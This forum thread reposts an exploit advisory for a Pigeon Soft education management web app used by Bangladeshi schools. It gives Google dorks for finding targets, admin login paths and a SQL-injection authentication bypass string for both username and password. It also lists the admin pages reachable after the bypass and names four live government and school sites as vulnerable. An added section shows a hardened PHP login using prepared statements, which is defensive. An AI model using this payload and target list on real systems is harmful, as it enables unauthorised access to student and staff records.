Topic: WordPress PigeonSoft Improper Auth Vulnerability
KingSkrupellos
Comment: #1
WordPress PigeonSoft Improper Auth Vulnerability
04.11.2018 01:04
#################################################################################################

# Exploit Title : WordPress Developed By Pigeon Soft Bangladesh Education Management Improper Authentication Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 03/11/2018
# Vendor Homepage : pigeon-soft.com
# Tested On : Windows and Linux
# Category : WebApps
# Google Dork :
intext:''Developed By Pigeon Soft'' site:bd
intext:''Powered By Pigeon Soft'' site:bd
# Exploit Risk : Medium
# CWE : CWE-287 - [ Improper Authentication ] - CWE-592 - [ Authentication Bypass Issues ]
# CxSecurity.Com Exploit Link : cxsecurity.com/ascii/WLB-2018110018

#################################################################################################

# Admin Panel Login Path :

/app/login.php
/wp-login.php

# Authentication Bypass Exploit :

Admin Username : '=''or'

Admin Password : '=''or'

/app/index.php
/app/add-student.php
/app/students.php
/app/addworkingday.php
/app/studentin.php
/app/student-out.php
/app/report-attendance.php
/app/editmark.php
/app/public/admission-form.php
/app/admission-list.php
/app/admit.php
/app/print-admit.php
/app/update-result.php
/app/new-semester-plan.php
/app/semester-plan.php
/app/member-req.php
/app/update-list.php
/app/memberlist.php
/app/reports.php
/app/public/register-check.php
/app/create-message.php
/app/send-email.php
/app/public/membership.php
/app/update-settings.php

#################################################################################################

# Example Vulnerable Sites =>

[+] bograpoly.gov.bd/app/index.php

[+] gmmhs.edu.bd/app/login.php

[+] gfisc.edu.bd/app/login.php

[+] itihasacademybd.com/app/login.php

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################
(This topic was last edited on 04.11.2018 at 01:11. Edited by: KingSkrupellos.)

We don't care what people think about us, we are proud of ourselves, we are not gonna change for anyone. I do not have my own website. No contact. # KingSkrupellos # Cyberizm Digital Security Technological Turkish Moslem Army.
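
Added example, not part of the original post and not Pigeon Soft's code: a hardened login check in PHP, assuming the `/app/login.php` form builds its query by concatenating the posted fields into SQL text (the usual cause when a quote-based string like the one above is accepted). The table `admins`, the column names and the function `check_login` are hypothetical.

```php
<?php
declare(strict_types=1);
// Added example, not Pigeon Soft's code. Table, column and function names are assumptions.

// Assumed vulnerable pattern: the posted values are concatenated into the SQL
// text, so quote characters in them are parsed as SQL instead of as data:
//   "SELECT * FROM admins WHERE username='$user' AND password='$pass'"

// Hardened check: bound parameter for the lookup, password hash compared in PHP.
function check_login(PDO $db, string $user, string $pass): bool
{
    // The placeholder keeps the submitted value out of the SQL grammar.
    $stmt = $db->prepare('SELECT pw_hash FROM admins WHERE username = :u');
    $stmt->execute([':u' => $user]);
    $hash = $stmt->fetchColumn();          // false when no such user

    // Unknown users are verified against a dummy hash so both paths cost
    // one password_verify() call.
    static $dummy = null;
    $dummy ??= password_hash('unused', PASSWORD_DEFAULT);
    $ok = password_verify($pass, is_string($hash) ? $hash : $dummy);
    return $ok && is_string($hash);
}

// Constructed demo data in an in-memory SQLite database (needs pdo_sqlite).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE admins (username TEXT PRIMARY KEY, pw_hash TEXT NOT NULL)');
$db->prepare('INSERT INTO admins VALUES (?, ?)')
   ->execute(['admin', password_hash('correct horse battery', PASSWORD_DEFAULT)]);

$posted = "'=''or'";   // the string from the post, handled purely as data
$cases = [[$posted, $posted], ['admin', $posted], ['admin', 'correct horse battery']];
foreach ($cases as [$u, $p]) {
    printf("%-8s / %-22s => %s\n", $u, $p, check_login($db, $u, $p) ? 'accepted' : 'rejected');
}
```

On a MySQL connection, also set `PDO::ATTR_EMULATE_PREPARES` to `false` so the driver uses server-side prepared statements, and call `session_regenerate_id(true)` after a successful login.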



Dessy
Comment: #2
RE: WordPress PigeonSoft Improper Auth Vulnerability
08.11.2018 08:29
Thanks for your effort :)
